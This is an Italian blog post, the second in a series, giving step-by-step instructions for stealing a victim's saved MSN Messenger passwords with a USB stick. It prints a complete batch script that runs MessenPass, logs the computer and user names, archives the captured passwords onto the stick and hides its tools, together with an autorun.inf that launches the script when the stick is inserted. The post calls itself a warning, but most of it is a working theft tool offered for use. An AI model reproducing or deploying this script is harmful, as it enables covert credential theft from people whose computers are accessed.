Rubare password di MSN – 2



Riprendiamo a visualizzare i vari modi per rubare una password di MSN, cercando quindi di evitare che i lettori vengano truffati e si ritrovino con il loro account bloccato! Per il primo metodo, guardate i miei precedenti articoli. Il metodo di cui voglio parlarvi ora è più sofisticato e necessita l’utilizzo di una Penna USB e di trovarsi a contatto con il pc della vittima per essere utilizzato.

1 : Create una nuova cartella sul desktop;

2 : Andate su


nirsoft.net

per scaricare il programma MessenPass v1.29 e copiate poi il programma nella cartella creata precedentemente;

3 : Per fare ciò dovete avere winrar installato. Una volta che lo avrete installato (è possibile trovare il download gratuito su google),  andate nella cartella d’installazione di winrar e copiate l’eseguibile RAR.EXE nella cartella del punto 1;

4 : Aprite un file di blocco note e sciveteci dentro (attenzione le seguenti sono stringhe di codice e la loro modifica causerà il malfunzionamento di tutta la procedura!):

@mspass.exe /sverhtml mspass.html

REM Riassumo le Informazioni del PC nel file log.txt
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Data: %DATE% – Ora: %TIME% >> log.txt

REM Copio le password in un archivio protetto
@rar.exe a (qui il nome dell’ archivio).zip *.html log.txt > nul

REM Nascondo le utility della chiavetta
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Ora dovete soltanto salvare il file con il nome lancia.bat impostando  come metodo di salvataggio tutti file;

5 : Aprite un nuovo file con il blocco note e scriveteci dentro le seguenti stringhe (anche qui non vanno modificate):

[autorun]

open=lancia.bat
action=ruba password

E salvate il file col nome di autorun.inf


6 :
Inserite i due file di blocco note creati nella cartella del Punto 1;

7 : Inserite la cartella nella vostra chiavetta usb

Ultimo: Ora ogni volta che la chiavetta verrà inserita in un pc, vi chiederà se lanciare il file .bat al suo interno, il quale andrà a prelevare le password per inserirle nell’archivio presente all’interno della pennetta.

Attenzione dunque a tutto quello che potrebbero fare le persone inserendo una chiavetta nel vostro pc! Non fidatevi mai !!

20100112msn75login

Annunci sponsorizzati:
Condividi su Facebook Condividi su Twitter!
Pinterest